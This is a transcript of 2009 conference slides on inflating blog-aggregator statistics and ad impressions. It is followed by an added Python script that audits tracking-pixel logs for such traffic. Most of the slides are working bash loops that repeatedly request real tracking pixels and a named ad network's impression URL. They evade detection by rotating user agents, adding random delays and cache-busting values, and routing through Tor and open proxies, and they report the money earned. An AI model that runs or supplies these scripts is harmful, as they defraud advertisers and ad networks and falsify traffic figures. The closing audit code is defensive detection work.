Smashing the stats for fun (and profit)
Shaun Dewberry
ZaCon 2009
http://www.zacon.org.za/Archives/2009/slides/

Published in: Technology

Transcript

  • 1. If you’re not famous, fake it.
  • 2. Shaun Dewberry
       • Unix/Security guy
       • Pretoria University (expelled for hacking!)
       • aka LowVoltage
  • 3. Technorati.com
       • In SA:
       • Amatomu.com
       • Afrigator.co.za
       • Blogger pissing contest
  • 4. <!-- Start AMATOMU.COM code -->
       <img height='1' style='display:none' width='1' src='http://www.amatomu.com/log.php?cid=a433e87b0ebYe493dc055153ae332be0eeda46c' />
       <!-- End AMATOMU.COM code -->
  • 5. • Slow
       • Not really automated
       • Boring
       • Obvious
       • Traceable
  • 6. while [ 1 ]
       do
       wget http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
       done;
  • 7. • Don’t crash the server!
       • More random log entries
       #!/bin/sh
       Set RANDOM=$$
       while [ 1 ]
       do
       let "delay = RANDOM % 30";  # Random 0 to 30 Second delay
       wget http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
       echo "Waiting $delay seconds"
       sleep $delay
       done;
  • 8. #!/bin/bash
       set RANDOM=$$
       while [ 1 ]
       do
       let "delay = RANDOM % 6";
       wget --delete-after http://afrigator.com/track/5013-none.gif
       sleep $delay;
       done;
  • 9. • wget User-Agent visible in server logs
       • All visits from same source IP address
  • 10. http://www.user-agent.org
       "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30
       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.1
       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2
       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0
       Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
       Mozilla/5.0 (Windows; U; Windows NT 5.1; en_US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.7
       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19
  • 11. set RANDOM=$$
       while [ 1 ]
       do
       let "delay = RANDOM % 30"
       let "ua = RANDOM % `wc -l useragents.txt | awk '{print $1}'` + 1"
       uastring=`sed -n ${ua}p useragents.txt;`
       wget -q --delete-after --user-agent="$uastring" http://www.amatomu.com/log.php?cid=a433e87b0eb>e493dc055153ae332be0eeda46c
       sleep $delay
       done;
  • 12. “Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location.”
       -- torproject.org
  • 13. wget   tsocks   tor   Aggregator
       • tsocks.sourceforge.net – Transparent Socks Proxy
  • 14. • #20 of 31 “top non-US startups to watch worldwide” by Business 2.0 (money.cnn.com)
       • Top 10 International Products for 2008 – ReadWriteWeb
       • Acquired by Naspers
       • Blah blah blah…
       • WTF? Security Anyone?
  • 15. • Invitations to launches
       • More traffic (ironic, isn’t it?)
       • Gadgets for review
       • Press accreditation
       • Fake a career as a social media expert
       • Social engineering hack
  • 16. • Ad network linking bloggers and advertisers
       • Revenue based on CPM (ad impressions)
       • CPM is horribly broken
  • 17. <!--/* Adgator.co.za Javascript Tag v2.6.3 */-->
       <script type='text/javascript'><!--//<![CDATA[
          var m3_u = (location.protocol=='https:'?'https://ads.adgator.co.za/delivery/ajs.php':'http://ads.adgator.co.za/delivery/ajs.php');
          var m3_r = Math.floor(Math.random()*99999999999);
          if (!document.MAX_used) document.MAX_used = ',';
          document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
          document.write ("?zoneid=471");
          document.write ('&amp;cb=' + m3_r);
          if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
          document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
          document.write ("&amp;loc=" + escape(window.location));
          if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
          if (document.context) document.write ("&context=" + escape(document.context));
          if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
          document.write ("'></scr"+"ipt>");
       //]]>--></script><noscript><a href='http://ads.adgator.co.za/delivery/ck.php?n=ad677422&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ad677422' border='0' alt='' /></a></noscript>
       Only care about ad image: http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f
  • 18. • No ads are served to wget??
       • OpenX Ad Server
       • If no cookie gets set, then no ad gets served
       • Certain User Agents are ignored
       • First ad served, but no ads thereafter (caching?)
       • Geo-targeting
  • 19. • Accept cookies (and turf them)
       • &cb=RANDOM parameter (Cache blocking)
       • tor nodes in ZA?
       • Zombie TelkomADSL botnet?
       • Open proxy servers – Proof of Concept
  • 20. let "delay = RANDOM % 40"  # Up to 40 second delay – let’s not be greedy
       let "prand = RANDOM % `wc -l proxies.txt | awk '{print $1}'` + 1"
       http_proxy=`sed -n ${prand}p proxies.txt;` # select a random proxy
       let "ua = RANDOM % `wc -l useragents.txt | awk '{print $1}'` + 1"
       uastring=`sed -n ${ua}p useragents.txt;` # random useragent
       let "rand = RANDOM % 999999999" # random integer for cache blocking
       if [ $http_proxy == "tsocks" ]; then
          # 1/3rd of the time route through tor
          export http_proxy=
          /usr/bin/tsocks /usr/local/bin/wget --no-clobber --no-cache --max-redirect=0 --user-agent="$uastring" --referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
       else
          # otherwise request the ad straight through the SA proxy
          /usr/bin/wget -d --no-clobber --no-cache --user-agent="$uastring" --referer=http://ramboguy.co.za "http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"
       fi
  • 21. • 90 Ad impressions/day
       • Paid Ads Served: 224
       • Earnings: R11.09
  • 22. • 800 impressions/day (2 hour run)
       • 1677 Paid Ads Served
       • Earnings: R86.58
  • 23. • Automated auditing with complex analysis tools
       • Don’t use impression based costing models (duh!)
  • 24. • R8 per hour (conservative)
       • 24 hours
       • 30 days
       • R 5 760 per month
       • Mahala
       • The beer’s on me!
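
Slides 9 and 11 name the traces this traffic leaves in the aggregator's logs, and slide 23 asks for automated auditing. The following is an added example, not part of the original slides, showing that audit over a tracking-pixel access log; it assumes Apache combined log format, and the thresholds, function names, placeholder counter id and sample lines are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"$')
AUTOMATION_UA = re.compile(r"^(wget|curl|python-|libwww|java/)|^-?$", re.I)

def parse(line):
    """Return (ip, counter_id, user_agent) for a counter hit, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ip, target, ua = m.groups()
    url = urlsplit(target)
    cid = parse_qs(url.query).get("cid", [None])[0]
    return (ip, cid, ua) if url.path == "/log.php" and cid else None

def audit(lines, max_hits_per_ip=3, max_uas_per_ip=2):
    """Per counter id: raw hits, hits still credited, and flagged source IPs."""
    hits = defaultdict(lambda: defaultdict(list))      # cid -> ip -> [ua, ...]
    for ip, cid, ua in filter(None, map(parse, lines)):
        hits[cid][ip].append(ua)
    report = {}
    for cid, by_ip in hits.items():
        flags, credited = {}, 0
        for ip, uas in by_ip.items():
            reasons = []
            if any(AUTOMATION_UA.search(ua) for ua in uas):
                reasons.append("automation-ua")        # slide 9: tool UA in the logs
            if len(uas) > max_hits_per_ip:
                reasons.append("ip-volume")            # slide 9: one source IP
            if len(set(uas)) > max_uas_per_ip:
                reasons.append("ua-rotation")          # slide 11: UA changes, IP does not
            if reasons:
                flags[ip] = reasons
            else:
                credited += len(uas)
        raw = sum(len(uas) for uas in by_ip.values())
        report[cid] = {"raw": raw, "credited": credited, "flags": flags}
    return report

# Constructed sample traffic: documentation IP ranges, placeholder counter id.
def _hit(ip, ua, cid="EXAMPLE-CID"):
    return (f'{ip} - - [10/Oct/2009:13:55:36 +0200] '
            f'"GET /log.php?cid={cid} HTTP/1.1" 200 43 "-" "{ua}"')
FF = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
SAMPLE = ([_hit("198.51.100.7", "Wget/1.11.4")] * 2
          + [_hit("203.0.113.9", f"Browser/{n}.0") for n in range(5)]
          + [_hit(f"192.0.2.{n}", FF) for n in range(1, 4)])
```

Requests spread across open proxies or Tor, as on slide 20, pass these per-IP checks, which is why slide 23 pairs auditing with dropping impression-based costing.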